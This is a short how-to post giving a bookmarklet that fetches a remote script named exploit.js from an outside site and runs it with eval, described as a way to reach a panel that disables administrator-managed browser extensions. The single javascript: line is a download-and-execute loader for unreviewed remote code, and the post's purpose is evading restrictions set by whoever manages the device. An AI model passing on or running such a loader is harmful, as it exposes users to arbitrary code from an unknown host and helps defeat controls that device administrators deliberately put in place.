THIS ONLY ALLOWS YOU TO DISABLE WEB RESTRICTIONS LIKE EXTENSIONS THAT YOU CANT DISABLE MANUALLY

1. add this script to your bookmarks
javascript:fetch("https://compactcow.com/ltbeef/exploit.js").then(data=>{data.text().then(text=>{eval(text)})});
2. must be on any other tab that isn't a NEW TAB.
3. when you click it the first time it should say 
" 404. That’s an error. The requested URL /webstoreC4EME was not found on this server. That’s all we know."

4. click it a second time and it should bring you to a panel that allows you to disable admin extensions which when turned off will allow you to visit any website without them spying on your every move.